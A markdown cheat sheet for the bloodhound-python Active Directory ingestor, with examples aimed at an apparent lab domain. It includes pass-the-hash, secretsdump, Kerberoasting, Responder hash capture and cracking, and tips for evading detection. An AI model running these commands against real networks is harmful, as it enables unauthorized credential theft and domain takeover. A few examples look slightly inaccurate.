bloodhound.md (18598B)
1 --- 2 title: "BloodHound" 3 description: "BloodHound data collection and analysis with the Python ingestor plus cypher query patterns." 4 category: active-directory 5 subcategory: "Tooling & Recon" 6 tags: [active-directory, graph, enumeration] 7 tools: [BloodHound, bloodhound-python] 8 difficulty: intermediate 9 updated: "2026-08-09" 10 source: "repo:Active-Directory/BloodHound-Python_Cheatsheet.md" 11 --- 12 13 # BloodHound 14 15 Remote Active Directory enumeration ingestor for BloodHound over LDAP. 16 17 ## Overview 18 19 **bloodhound-python** (aka BloodHound.py) is a Python-based ingestor that collects AD data remotely without executing code on Windows systems. 20 21 Key features: 22 23 - Remote enumeration from Linux 24 - No code execution on target required 25 - LDAP-based collection with multiple authentication methods 26 - Kerberos support 27 - Outputs JSON files for BloodHound 28 29 ### When to Use bloodhound-python vs SharpHound 30 31 | Scenario | Tool | 32 |:---------|:-----| 33 | Have valid AD credentials, attacking from Linux | bloodhound-python | 34 | Have shell access on Windows machine | SharpHound | 35 | Need session enumeration | SharpHound | 36 | Remote enumeration only | bloodhound-python | 37 | Need local admin rights detection | SharpHound | 38 | Stealth is priority (no Windows execution) | bloodhound-python | 39 40 > **Note —** For current BloodHound Community Edition (BHCE), use the `-v` legacy output or the maintained `bloodhound-ce-python` fork depending on your ingestor version; the collection flags shown here are unchanged. 41 42 ## Installation 43 44 ### Kali Linux 45 46 ```bash 47 # Usually pre-installed on Kali 48 bloodhound-python --help 49 50 # If not installed 51 sudo apt update 52 sudo apt install bloodhound.py 53 ``` 54 55 ### Manual Installation (pip) 56 57 ```bash 58 # Install via pip 59 pip3 install bloodhound 60 61 # Or install from GitHub (latest version) 62 git clone https://github.com/fox-it/BloodHound.py.git 63 cd BloodHound.py 64 pip3 install . 65 66 # Verify installation 67 bloodhound-python --version 68 ``` 69 70 ### Dependencies 71 72 ```bash 73 # Required dependencies 74 pip3 install dnspython ldap3 impacket 75 76 # For Kerberos support 77 sudo apt install krb5-user 78 pip3 install pyasn1 pyasn1-modules 79 ``` 80 81 ## Basic Usage 82 83 ```bash 84 # Basic enumeration with all collection methods 85 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 86 87 # With automatic ZIP creation 88 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 89 90 # Specify output directory 91 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 -o /tmp/bloodhound 92 93 # Custom collection name 94 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --collectionmethod all 95 ``` 96 97 ### Essential Parameters 98 99 | Parameter | Description | Example | 100 |:----------|:------------|:--------| 101 | `-c, --collectionmethod` | Collection method(s) | `-c all` | 102 | `-u, --username` | Username | `-u judith.mader` | 103 | `-p, --password` | Password | `-p judith09` | 104 | `-d, --domain` | Domain name | `-d certified.htb` | 105 | `-ns, --nameserver` | Domain Controller IP | `-ns 10.10.11.41` | 106 | `-dc, --domain-controller` | DC hostname | `-dc DC01.certified.htb` | 107 108 ## Authentication Methods 109 110 ### Method 1: Username & Password 111 112 ```bash 113 # Basic password authentication 114 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 115 116 # With domain prefix 117 bloodhound-python -c all -u certified.htb/judith.mader -p judith09 -ns 10.10.11.41 118 119 # Using domain\username format 120 bloodhound-python -c all -u 'certified.htb\judith.mader' -p judith09 -ns 10.10.11.41 121 ``` 122 123 ### Method 2: NTLM Hash (Pass-the-Hash) 124 125 ```bash 126 # Using NTLM hash 127 bloodhound-python -c all -u judith.mader --hashes :8846f7eaee8fb117ad06bdd830b7586c -d certified.htb -ns 10.10.11.41 128 129 # With LM hash (usually empty) 130 bloodhound-python -c all -u judith.mader --hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d certified.htb -ns 10.10.11.41 131 132 # From secretsdump output 133 bloodhound-python -c all -u administrator --hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 -d certified.htb -ns 10.10.11.41 134 ``` 135 136 ### Method 3: Kerberos Authentication 137 138 ```bash 139 # Using Kerberos ticket 140 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 -k 141 142 # With ticket cache 143 export KRB5CCNAME=/tmp/judith.ccache 144 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 -k --kerberos 145 146 # Using AES key 147 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 --aesKey <aes_key> 148 ``` 149 150 ### Method 4: No Password (with .ccache file) 151 152 ```bash 153 # Set Kerberos ticket cache 154 export KRB5CCNAME=/tmp/krb5cc_judith.mader 155 156 # Run without password 157 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 -k --no-pass 158 ``` 159 160 ### Method 5: Interactive Password Prompt 161 162 ```bash 163 # Prompt for password (no password in bash history) 164 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 165 # Will prompt: Password: 166 ``` 167 168 ## Collection Methods 169 170 | Method | Collects | 171 |:-------|:---------| 172 | all | Everything below | 173 | group | Groups and members | 174 | localadmin | Local admin relationships | 175 | session | Logged on users | 176 | trusts | Trust relationships | 177 | default | Group, LocalAdmin, Session, Trusts | 178 | container | OUs and Containers | 179 | psremote | PowerShell remoting access | 180 | dcom | DCOM execution rights | 181 | rdp | Remote Desktop access | 182 | objectprops | Additional AD object properties | 183 | acl | Access Control Lists | 184 | loggedon | Currently logged on users | 185 186 ```bash 187 # All methods (most comprehensive) 188 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 189 190 # Default methods only 191 bloodhound-python -c default -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 192 193 # Specific single method 194 bloodhound-python -c group -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 195 196 # Multiple specific methods 197 bloodhound-python -c group,acl,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 198 199 # All except sessions (less noisy) 200 bloodhound-python -c group,localadmin,trusts,acl,container,objectprops -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 201 ``` 202 203 Speed vs completeness: 204 205 ```bash 206 # Quick enumeration (fastest) 207 bloodhound-python -c group,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 208 209 # Comprehensive enumeration (slower but complete) 210 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 211 212 # Stealth enumeration (LDAP only, no SMB) 213 bloodhound-python -c group,acl,objectprops,container,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 214 ``` 215 216 ## Advanced Options 217 218 ### Domain Controller Specification 219 220 ```bash 221 # Using IP address (nameserver) 222 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 223 224 # Using hostname (domain controller) 225 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -dc dc01.certified.htb 226 227 # Using FQDN 228 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -dc dc01.certified.htb -ns 10.10.11.41 229 230 # Multiple DCs (will try in order) 231 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41,10.10.11.42 232 ``` 233 234 ### LDAP Configuration 235 236 ```bash 237 # Specify LDAP port (default: 389) 238 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 389 239 240 # Use LDAPS (secure LDAP, port 636) 241 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 636 242 243 # Use Global Catalog port 244 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 3268 245 246 # Use GC-SSL 247 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 3269 248 249 # Disable LDAP signing/channel binding enforcement 250 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 636 --disable-signing 251 ``` 252 253 ### DNS Configuration 254 255 ```bash 256 # Force TCP for DNS queries 257 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --dns-tcp 258 259 # Specify DNS timeout 260 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --dns-timeout 5 261 ``` 262 263 ### Global Catalog Options 264 265 ```bash 266 # Use Global Catalog for queries 267 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --global-catalog 268 269 # Specify GC hostname 270 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --gc dc01.certified.htb 271 ``` 272 273 ### Computer/Host Enumeration 274 275 ```bash 276 # Exclude domain controllers from enumeration 277 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --exclude-dcs 278 279 # Custom computer filter (LDAP filter) 280 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --computerfilter "(operatingSystem=*Server*)" 281 ``` 282 283 ## Output Options 284 285 ```bash 286 # Default output (current directory) 287 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 288 289 # Custom output directory 290 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 -o /tmp/bloodhound_data 291 292 # Specific output directory with ZIP 293 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 -o /tmp/bh --zip 294 ``` 295 296 Output files (without `--zip`): 297 298 ```text 299 20241127163045_computers.json 300 20241127163045_users.json 301 20241127163045_groups.json 302 20241127163045_domains.json 303 20241127163045_gpos.json 304 20241127163045_ous.json 305 20241127163045_containers.json 306 ``` 307 308 With `--zip`: `20241127163045_bloodhound.zip` (contains all JSON files). 309 310 ## Common Usage Scenarios 311 312 ### Scenario 1: Initial Domain Enumeration 313 314 ```bash 315 # Quick initial recon 316 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 317 318 # Save to specific location 319 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 -o ~/htb/certified/bloodhound --zip 320 ``` 321 322 ### Scenario 2: Stealth Enumeration (LDAP Only) 323 324 ```bash 325 # No SMB connections, LDAP queries only 326 bloodhound-python -c group,acl,objectprops,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 327 328 # Minimize queries 329 bloodhound-python -c group,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 330 ``` 331 332 ### Scenario 3: After Obtaining Hash 333 334 ```bash 335 # Pass-the-hash attack 336 bloodhound-python -c all -u administrator --hashes :32693b11e6aa90eb43d32c72a07ceea6 -d certified.htb -ns 10.10.11.41 --zip 337 338 # After secretsdump 339 impacket-secretsdump certified.htb/judith.mader:judith09@10.10.11.41 340 # Use extracted hash 341 bloodhound-python -c all -u administrator --hashes :32693b11e6aa90eb43d32c72a07ceea6 -d certified.htb -ns 10.10.11.41 --zip 342 ``` 343 344 ### Scenario 4: Multi-Domain Environment 345 346 ```bash 347 # Enumerate parent domain 348 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 349 350 # Enumerate child domain 351 bloodhound-python -c all -u judith.mader -p judith09 -d child.certified.htb -ns 10.10.11.42 --zip 352 353 # Enumerate trusted domain (if creds work) 354 bloodhound-python -c all -u judith.mader -p judith09 -d external.local -ns 10.10.11.50 --zip 355 ``` 356 357 ### Scenario 5: Kerberos Authentication 358 359 ```bash 360 # Get TGT first 361 impacket-getTGT certified.htb/judith.mader:judith09 362 363 # Set ticket cache 364 export KRB5CCNAME=/tmp/judith.mader.ccache 365 366 # Run bloodhound with Kerberos 367 bloodhound-python -c all -u judith.mader -d certified.htb -ns 10.10.11.41 -k --no-pass --zip 368 ``` 369 370 ### Scenario 6: Through SOCKS Proxy 371 372 ```bash 373 # Set up proxy (e.g. with chisel) 374 export HTTP_PROXY=socks5://127.0.0.1:1080 375 export HTTPS_PROXY=socks5://127.0.0.1:1080 376 377 # Or use proxychains 378 proxychains bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 379 ``` 380 381 ### Scenario 7: Limited User Permissions 382 383 ```bash 384 # Low-privilege user - collect what you can 385 bloodhound-python -c group,trusts -u lowpriv -p password123 -d certified.htb -ns 10.10.11.41 --zip 386 ``` 387 388 ## SharpHound Comparison 389 390 | Feature | bloodhound-python | SharpHound | 391 |:--------|:-----------------|:-----------| 392 | Platform | Linux/Remote | Windows/Local | 393 | Execution | No code on target | Runs on target | 394 | Sessions | Limited | Full | 395 | Local Admin | Via LDAP | Direct query | 396 | LDAP Data | Full | Full | 397 | Groups | Full | Full | 398 | ACLs | Full | Full | 399 | GPOs | Full | Full | 400 | Stealth | Better | More noisy | 401 | Speed | Slower | Faster | 402 403 bloodhound-python: 404 405 ```bash 406 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 407 ``` 408 409 SharpHound equivalent (on Windows as judith.mader): 410 411 ```powershell 412 .\SharpHound.exe -c All -d certified.htb --domaincontroller 10.10.11.41 413 ``` 414 415 ## Troubleshooting 416 417 ### "Could not resolve domain" 418 419 ```bash 420 # Add to /etc/hosts 421 echo "10.10.11.41 certified.htb dc01.certified.htb" | sudo tee -a /etc/hosts 422 423 # Use DC hostname 424 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -dc dc01.certified.htb -ns 10.10.11.41 425 ``` 426 427 ### "Authentication failed" 428 429 ```bash 430 # Check credentials 431 nxc smb 10.10.11.41 -u judith.mader -p judith09 -d certified.htb 432 433 # Try different username formats 434 bloodhound-python -c all -u 'certified.htb\judith.mader' -p judith09 -ns 10.10.11.41 435 bloodhound-python -c all -u judith.mader@certified.htb -p judith09 -ns 10.10.11.41 436 bloodhound-python -c all -u certified.htb/judith.mader -p judith09 -ns 10.10.11.41 437 438 # Check for account lockout 439 nxc ldap 10.10.11.41 -u judith.mader -p judith09 -d certified.htb 440 ``` 441 442 ### "LDAP connection failed" 443 444 ```bash 445 # Try different LDAP port 446 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 389 447 448 # Try LDAPS 449 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 636 450 451 # Disable signing 452 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --disable-signing 453 454 # Check connectivity 455 nmap -p 389,636,3268,3269 10.10.11.41 456 ``` 457 458 ### "DNS resolution failed" 459 460 ```bash 461 # Add DNS server to /etc/resolv.conf 462 echo "nameserver 10.10.11.41" | sudo tee /etc/resolv.conf 463 464 # Use --dns-tcp 465 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --dns-tcp 466 ``` 467 468 ### "Kerberos authentication failed" 469 470 ```bash 471 # Check KRB5CCNAME and verify ticket 472 echo $KRB5CCNAME 473 klist 474 475 # Get fresh ticket 476 impacket-getTGT certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41 477 export KRB5CCNAME=/tmp/judith.mader.ccache 478 ``` 479 480 ### "Module not found" 481 482 ```bash 483 # Install dependencies 484 pip3 install bloodhound dnspython ldap3 impacket 485 486 # Or reinstall 487 pip3 install --upgrade bloodhound 488 ``` 489 490 ## Post-Collection 491 492 ### Verify Output Files 493 494 ```bash 495 # Check generated files 496 ls -lh *bloodhound* *_*.json 497 498 # Verify JSON files 499 for file in *.json; do 500 echo "Checking $file" 501 jq empty "$file" && echo "Valid JSON" || echo "Invalid JSON" 502 done 503 504 # Count objects in files 505 echo "Users: $(jq '.users | length' *_users.json)" 506 echo "Groups: $(jq '.groups | length' *_groups.json)" 507 echo "Computers: $(jq '.computers | length' *_computers.json)" 508 ``` 509 510 ### Import to BloodHound 511 512 ```bash 513 # Start Neo4j 514 sudo neo4j start 515 516 # Start BloodHound GUI 517 bloodhound 518 519 # Or use bloodhound-import (if available) 520 bloodhound-import -f 20241127163045_bloodhound.zip 521 ``` 522 523 ### Manual ZIP Creation 524 525 ```bash 526 zip bloodhound_certified.zip *_computers.json *_users.json *_groups.json *_domains.json *_gpos.json *_ous.json *_containers.json 527 ``` 528 529 ## Chaining with Other Tools 530 531 ```bash 532 # 1. Enumerate domain users first 533 nxc ldap 10.10.11.41 -u judith.mader -p judith09 -d certified.htb --users 534 535 # 2. Run BloodHound 536 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 537 538 # 3. Enumerate shares 539 nxc smb 10.10.11.41 -u judith.mader -p judith09 -d certified.htb --shares 540 541 # 4. Check for AS-REP roasting 542 impacket-GetNPUsers certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41 -request 543 544 # 5. Kerberoasting 545 impacket-GetUserSPNs certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41 -request 546 ``` 547 548 ### Automation Script 549 550 ```bash 551 #!/bin/bash 552 # bloodhound_auto.sh 553 554 DOMAIN="certified.htb" 555 DC_IP="10.10.11.41" 556 USERNAME="judith.mader" 557 PASSWORD="judith09" 558 OUTPUT_DIR="/tmp/bloodhound_$(date +%Y%m%d_%H%M%S)" 559 560 echo "[+] Creating output directory: $OUTPUT_DIR" 561 mkdir -p "$OUTPUT_DIR" 562 563 echo "[+] Running BloodHound collection..." 564 bloodhound-python -c all \ 565 -u "$USERNAME" \ 566 -p "$PASSWORD" \ 567 -d "$DOMAIN" \ 568 -ns "$DC_IP" \ 569 -o "$OUTPUT_DIR" \ 570 --zip 571 572 echo "[+] Collection complete! Output saved to: $OUTPUT_DIR" 573 ls -lh "$OUTPUT_DIR" 574 ``` 575 576 ### From Responder/LLMNR Poisoning 577 578 ```bash 579 # 1. Capture credentials with Responder 580 sudo responder -I tun0 -wv 581 582 # 2. Crack the hash 583 hashcat -m 5600 captured.hash /usr/share/wordlists/rockyou.txt 584 585 # 3. Use credentials with BloodHound 586 bloodhound-python -c all -u captured_user -p cracked_pass -d certified.htb -ns 10.10.11.41 --zip 587 ``` 588 589 ## Operational Security 590 591 ```bash 592 # Minimal queries (stealthy) 593 bloodhound-python -c group,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 594 595 # Avoid computer enumeration (no SMB connections) 596 bloodhound-python -c group,acl,trusts -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 597 598 # Use LDAPS for encryption 599 bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --ldapport 636 --zip 600 ``` 601 602 What defenders might see: LDAP queries from an unusual source, many LDAP binds in a short time, queries for sensitive attributes (adminCount, etc.), and SMB connections for session enumeration. Mitigate by using a compromised internal host as a jump box, spreading collection over time, and preferring SharpHound on a compromised Windows box when appropriate. 603 604 ## Quick Reference Card 605 606 ```bash 607 # Standard enumeration 608 bloodhound-python -c all -u USER -p PASS -d DOMAIN -ns DC_IP --zip 609 610 # With hash 611 bloodhound-python -c all -u USER --hashes :NTHASH -d DOMAIN -ns DC_IP --zip 612 613 # With Kerberos 614 export KRB5CCNAME=/tmp/ticket.ccache 615 bloodhound-python -c all -u USER -d DOMAIN -ns DC_IP -k --no-pass --zip 616 617 # Stealth mode 618 bloodhound-python -c group,acl,trusts -u USER -p PASS -d DOMAIN -ns DC_IP --zip 619 620 # Custom output 621 bloodhound-python -c all -u USER -p PASS -d DOMAIN -ns DC_IP -o /tmp/bh --zip 622 623 # Through proxy 624 proxychains bloodhound-python -c all -u USER -p PASS -d DOMAIN -ns DC_IP --zip 625 ``` 626 627 ## Resources 628 629 - BloodHound.py GitHub: https://github.com/fox-it/BloodHound.py 630 - BloodHound Documentation: https://bloodhound.readthedocs.io/ 631 - BloodHound GUI: https://github.com/BloodHoundAD/BloodHound 632 - Custom Cypher Queries: https://github.com/hausec/Bloodhound-Custom-Queries